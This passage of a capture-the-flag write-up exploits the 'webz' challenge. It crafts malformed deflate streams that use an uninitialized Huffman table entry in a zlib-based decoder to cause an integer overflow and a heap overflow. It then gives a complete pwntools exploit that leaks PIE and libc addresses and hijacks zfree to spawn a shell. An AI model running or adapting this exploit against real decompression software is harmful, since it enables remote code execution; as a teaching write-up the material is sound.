ll_lengths = [ 0 ] * 286 ll_lengths [ 256 ] = 3 # EOB dist_lengths = [ 0 ] * 30 for i in range ( 17 , 30 ) : dist_lengths [ i ] = 15 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) # DYNAMIC BLOCK ============================================================================== Block 2: prepares the ground for the bug by filling the table area with Distance symbols. Those entries will persist in uninitialized slots later. # DYNAMIC BLOCK ============================================================================== symbol_stream = [ ] symbol_stream . append ( ( "INVALID" , ( 8 , 10 ) ) ) symbol_stream . append ( ( "INVALID" , ( 0 b1111111 , 7 ) ) ) # extra bits symbol_stream . append ( ( "INVALID" , ( int ( '000' [ :: - 1 ] , 2 ) , 3 ) ) ) symbol_stream . append ( ( "INVALID" , ( 0 b1111111 , 7 ) ) ) # extra bits symbol_stream . append ( ( 'EOB' , 256 ) ) ll_lengths = [ 0 ] * 286 ll_lengths [ 256 ] = 10 # EOB ll_lengths [ 257 ] = 10 # Length 3 ll_lengths [ 258 ] = 12 # Length 4 dist_lengths = [ 0 ] * 30 dist_lengths [ 17 ] = 3 # Distance ? ? ? create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) # DYNAMIC BLOCK ============================================================================== Block 3: creates an incomplete Huffman table and references the uninitialized entry to perform LZ77 decoding. This actually triggers the bug and causes integer overflow in avail_out . From this point on, boundary checks for the decompression buffer malfunction, enabling buffer overflow. # STORED BLOCK =============================================================================== stream . write_bits ( 0 , 5 ) # dummy stream . write_bits ( 0 , 1 ) # BFINAL stream . write_bits ( 0 , 2 ) # BTYPE ( 0 for stored ) stream . bytebits ( ) stored_block_length = 0x10 stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( ord ( 'C' ) , 8 ) # STORED BLOCK =============================================================================== # DYNAMIC BLOCK ============================================================================== symbol_stream = [ ] symbol_stream . append ( ( 'LIT' , 65 ) ) for i in range ( 0 , 0x2ce ) : symbol_stream . append ( ( 'LD' , ( 10 , 1 ) ) ) for i in range ( 0 , 7 ) : symbol_stream . append ( ( 'LIT' , 65 ) ) symbol_stream . append ( ( 'EOB' , 256 ) ) ll_lengths = [ 0 ] * 286 ll_lengths [ 65 ] = 3 # 'A' ll_lengths [ 256 ] = 3 # EOB ll_lengths [ 264 ] = 3 # Length 10 dist_lengths = [ 0 ] * 30 dist_lengths [ 0 ] = 3 # Distance 1 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) # DYNAMIC BLOCK ============================================================================== As noted, to overwrite z_stream infstream , we must first fill the 8192‑byte output buffer. We use LZ77 and a stored block to push ~8120 bytes of padding. Due to padding/alignment within WebzState , we need 8120 bytes (not 8192) to reach just before z_stream infstream . Also, because the decompression buffer is larger than the compressed input limit, we use LZ77 to generate many output bytes from little input. # STORED BLOCK =============================================================================== overwrriten_infstream = b 'X' * 0x60 stream . write_bits ( 1 , 1 ) # BFINAL stream . write_bits ( 0 , 2 ) # BTYPE ( 0 for stored ) stream . bytebits ( ) stored_block_length = len ( overwrriten_infstream ) stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( overwrriten_infstream [ i ] , 8 ) # STORED BLOCK ============================================================================= The final block performs the actual overflow to overwrite z_stream infstream , letting us set its members arbitrarily. Running the PoC confirms z_stream infstream is overwritten. 5. Exploit The exploit is straightforward. printf ( "Read receipt: %s " , webz_state . infstream . msg ) ; First, by partially overwriting the msg pointer in infstream or setting it arbitrarily, we get arbitrary read. local int updatewindow ( z_streamp strm , const Bytef * end , unsigned copy ) { struct inflate_state FAR * state ; unsigned dist ; state = ( struct inflate_state FAR * ) strm -> state ; if ( state -> window == Z_NULL ) { state -> window = ( unsigned char FAR * ) ZALLOC ( strm , 1U << state -> wbits , sizeof ( unsigned char ) ) ; if ( state -> window == Z_NULL ) return 1 ; } . . . int ZEXPORT inflateEnd ( z_streamp strm ) { struct inflate_state FAR * state ; if ( inflateStateCheck ( strm ) ) return Z_STREAM_ERROR ; state = ( struct inflate_state FAR * ) strm -> state ; if ( state -> window != Z_NULL ) ZFREE ( strm , state -> window ) ; ZFREE ( strm , strm -> state ) ; strm -> state = Z_NULL ; Tracev ( ( stderr , "inflate: end " ) ) ; return Z_OK ; } Additionally, since updatewindow and inflateEnd call zalloc / zfree , control‑flow hijacking is easy. import struct from pwn import * class BitStream : """LSB-first bit stream writer.""" def __init__ ( self ) : self . bits = 0 self . bit_count = 0 self . data = bytearray ( ) def write_bits ( self , value , num_bits ) : for i in range ( num_bits ) : bit = ( value >> i ) & 1 if bit : self . bits | = ( 1 << self . bit_count ) self . bit_count += 1 if self . bit_count == 8 : self . data . append ( self . bits ) self . bits = 0 self . bit_count = 0 def bytebits ( self ) : self . write_bits ( 0 , 8 - ( self . bit_count % 8 ) ) def get_bytes ( self ) : if self . bit_count > 0 : self . data . append ( self . bits ) return self . data def generate_huffman_codes_from_lengths ( lengths ) : max_len = 0 for length in lengths : if length > max_len : max_len = length if max_len == 0 : return { } bl_count = [ 0 ] * ( max_len + 1 ) for length in lengths : if length > 0 : bl_count [ length ] += 1 code = 0 next_code = [ 0 ] * ( max_len + 1 ) for bits_len in range ( 1 , max_len + 1 ) : code = ( code + bl_count [ bits_len - 1 ] ) << 1 next_code [ bits_len ] = code huffman_codes = { } for i , length in enumerate ( lengths ) : if length != 0 : rev_code = int ( f' { next_code [ length ] : 0 { length } b } ' [ : : - 1 ] , 2 ) huffman_codes [ i ] = ( rev_code , length ) next_code [ length ] += 1 return huffman_codes lbase = [ 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 13 , 15 , 17 , 19 , 23 , 27 , 31 , 35 , 43 , 51 , 59 , 67 , 83 , 99 , 115 , 131 , 163 , 195 , 227 , 258 ] lext = [ 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 1 , 1 , 1 , 1 , 2 , 2 , 2 , 2 , 3 , 3 , 3 , 3 , 4 , 4 , 4 , 4 , 5 , 5 , 5 , 5 , 0 ] dbase = [ 1 , 2 , 3 , 4 , 5 , 7 , 9 , 13 , 17 , 25 , 33 , 49 , 65 , 97 , 129 , 193 , 257 , 385 , 513 , 769 , 1025 , 1537 , 2049 , 3073 , 4097 , 6145 , 8193 , 12289 , 16385 , 24577 ] dext = [ 0 , 0 , 0 , 0 , 1 , 1 , 2 , 2 , 3 , 3 , 4 , 4 , 5 , 5 , 6 , 6 , 7 , 7 , 8 , 8 , 9 , 9 , 10 , 10 , 11 , 11 , 12 , 12 , 13 , 13 ] order = [ 16 , 17 , 18 , 0 , 8 , 7 , 9 , 6 , 10 , 5 , 11 , 4 , 12 , 3 , 13 , 2 , 14 , 1 , 15 ] def find_len_sym ( length ) : for i in range ( len ( lbase ) ) : if lbase [ i ] > length : i -= 1 break base_len = lbase [ i ] extra_bits = lext [ i ] extra_val = length - base_len return 257 + i , extra_bits , extra_val def find_dist_sym ( distance ) : for i in range ( len ( dbase ) ) : if dbase [ i ] > distance : i -= 1 break base_dist = dbase [ i ] extra_bits = dext [ i ] extra_val = distance - base_dist return i , extra_bits , extra_val def encode_lengths_rle ( lengths ) : encoded = [ ] i = 0 while i < len ( lengths ) : current_len = lengths [ i ] if current_len == 0 : count = 0 while i + count < len ( lengths ) and lengths [ i + count ] == 0 and count < 138 : count += 1 if count >= 11 : encoded . append ( ( 18 , count - 11 ) ) i += count continue if count >= 3 : encoded . append ( ( 17 , count - 3 ) ) i += count continue if i > 0 and current_len == lengths [ i - 1 ] : count = 0 while i + count < len ( lengths ) and lengths [ i + count ] == current_len and count < 6 : count += 1 if count >= 3 : encoded . append ( ( 16 , count - 3 ) ) i += count continue encoded . append ( ( current_len , None ) ) i += 1 return encoded def create_dynamic_deflate_payload ( stream , is_last , symbol_stream , ll_lengths , dist_lengths ) : nlen = max ( i for i , length in enumerate ( ll_lengths ) if length > 0 ) + 1 ndist = max ( i for i , length in enumerate ( dist_lengths ) if length > 0 ) + 1 all_lengths = ll_lengths [ : nlen ] + dist_lengths [ : ndist ] rle_encoded_lengths = encode_lengths_rle ( all_lengths ) rle_symbols = [ item [ 0 ] for item in rle_encoded_lengths ] code_symbol_freqs = { sym : rle_symbols . count ( sym ) for sym in set ( rle_symbols ) } code_table_lengths = [ 0 ] * 19 for sym in code_symbol_freqs : code_table_lengths [ sym ] = 7 ncode = max ( i for i , length in enumerate ( order ) if code_table_lengths [ length ] > 0 ) + 1 code_huffman_table = generate_huffman_codes_from_lengths ( code_table_lengths ) stream . write_bits ( is_last , 1 ) stream . write_bits ( 2 , 2 ) stream . write_bits ( nlen - 257 , 5 ) stream . write_bits ( ndist - 1 , 5 ) stream . write_bits ( ncode - 4 , 4 ) for i in range ( ncode ) : stream . write_bits ( code_table_lengths [ order [ i ] ] , 3 ) for sym , extra_val in rle_encoded_lengths : code , length = code_huffman_table [ sym ] stream . write_bits ( code , length ) if sym == 16 : stream . write_bits ( extra_val , 2 ) elif sym == 17 : stream . write_bits ( extra_val , 3 ) elif sym == 18 : stream . write_bits ( extra_val , 7 ) ll_huffman_table = generate_huffman_codes_from_lengths ( ll_lengths ) dist_huffman_table = generate_huffman_codes_from_lengths ( dist_lengths ) for type , val in symbol_stream : if type == 'LIT' : code , length = ll_huffman_table [ val ] stream . write_bits ( code , length ) elif type == 'EOB' : code , length = ll_huffman_table [ val ] stream . write_bits ( code , length ) elif type == 'LD' : l , d = val len_sym , len_extra_bits , len_extra_val = find_len_sym ( l ) dist_sym , dist_extra_bits , dist_extra_val = find_dist_sym ( d ) code , length = ll_huffman_table [ len_sym ] stream . write_bits ( code , length ) if len_extra_bits > 0 : stream . write_bits ( len_extra_val , len_extra_bits ) code , length = dist_huffman_table [ dist_sym ] stream . write_bits ( code , length ) if dist_extra_bits > 0 : stream . write_bits ( dist_extra_val , dist_extra_bits ) elif type == 'INVALID' : code , length = val stream . write_bits ( code , length ) def create_exploit_stream ( stream ) : stream . write_bits ( 0 , 1 ) stream . write_bits ( 0 , 2 ) stream . bytebits ( ) stored_block_length = 0x200 stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( ord ( 'X' ) , 8 ) symbol_stream = [ ( 'EOB' , 256 ) ] ll_lengths = [ 0 ] * 286 ll_lengths [ 256 ] = 3 dist_lengths = [ 0 ] * 30 for i in range ( 17 , 30 ) : dist_lengths [ i ] = 15 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) symbol_stream = [ ] symbol_stream . append ( ( "INVALID" , ( 8 , 10 ) ) ) symbol_stream . append ( ( "INVALID" , ( 0b1111111 , 7 ) ) ) symbol_stream . append ( ( "INVALID" , ( int ( '000' [ : : - 1 ] , 2 ) , 3 ) ) ) symbol_stream . append ( ( "INVALID" , ( 0b1111111 , 7 ) ) ) symbol_stream . append ( ( 'EOB' , 256 ) ) ll_lengths = [ 0 ] * 286 ll_lengths [ 256 ] = 10 ll_lengths [ 257 ] = 10 ll_lengths [ 258 ] = 12 dist_lengths = [ 0 ] * 30 dist_lengths [ 17 ] = 3 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) stream . write_bits ( 0 , 5 ) stream . write_bits ( 0 , 1 ) stream . write_bits ( 0 , 2 ) stream . bytebits ( ) stored_block_length = 0x10 stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( ord ( 'C' ) , 8 ) symbol_stream = [ ] symbol_stream . append ( ( 'LIT' , 65 ) ) for i in range ( 0 , 0x2ce ) : symbol_stream . append ( ( 'LD' , ( 10 , 1 ) ) ) for i in range ( 0 , 7 ) : symbol_stream . append ( ( 'LIT' , 65 ) ) symbol_stream . append ( ( 'EOB' , 256 ) ) ll_lengths = [ 0 ] * 286 ll_lengths [ 65 ] = 3 ll_lengths [ 256 ] = 3 ll_lengths [ 264 ] = 3 dist_lengths = [ 0 ] * 30 dist_lengths [ 0 ] = 3 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) def overwrite_infstream ( stream , pay ) : overwrriten_infstream = pay stream . write_bits ( 1 , 1 ) stream . write_bits ( 0 , 2 ) stream . bytebits ( ) stored_block_length = len ( overwrriten_infstream ) stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( overwrriten_infstream [ i ] , 8 ) p = remote ( "webz.2025.ctfcompetition.com" , 1337 ) print ( p . recv ( 1024 ) ) answer = raw_input ( ) print ( answer ) p . sendline ( answer ) time . sleep ( 0.5 ) def send_webz_payload ( pay ) : NORMAL_AROUND_WIDTH_HEIGHT = p8 ( 0x0 ) + p8 ( 52 ) + p8 ( 0x0 ) + p8 ( 5 ) p . send ( p32 ( len ( pay ) + 12 ) ) p . send ( b"WEBZ" + NORMAL_AROUND_WIDTH_HEIGHT + b"\x00\x00\x00\x00" + pay ) time . sleep ( 0.5 ) pay = b"x" * 0x30 + p8 ( 0x0 ) stream = BitStream ( ) create_exploit_stream ( stream ) overwrite_infstream ( stream , pay ) send_webz_payload ( stream . get_bytes ( ) ) p . recvuntil ( b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' ) pie_base = u64 ( p . recvn ( 6 ) + b'\x00\x00' ) - 0x1251b print ( f'pie_base = { hex ( pie_base ) } ' ) pay = b"x" * 0x30 + p64 ( pie_base + 0x12000 ) stream = BitStream ( ) create_exploit_stream ( stream ) overwrite_infstream ( stream , pay ) send_webz_payload ( stream . get_bytes ( ) ) p . recvuntil ( b'receipt: ' ) libc_base = u64 ( p . recvn ( 6 ) + b'\x00\x00' ) - 0xadd30 print ( f'libc_base = { hex ( libc_base ) } ' ) system_without_align_issue = libc_base + 0x582d2 binsh = libc_base + 0x1cb42f jmp_to_zfree = pie_base + 0x44da dummy_memory = pie_base + 0x13000 pay = b"\x00" * 0x30 + p64 ( dummy_memory ) + p64 ( dummy_memory ) + p64 ( jmp_to_zfree ) + p64 ( system_without_align_issue ) + p64 ( binsh ) * 30 stream = BitStream ( ) create_exploit_stream ( stream ) overwrite_infstream ( stream , pay ) send_webz_payload ( stream . get_bytes ( ) ) p . interactive ( ) This is the final exploit. It successfully retrieves the flag.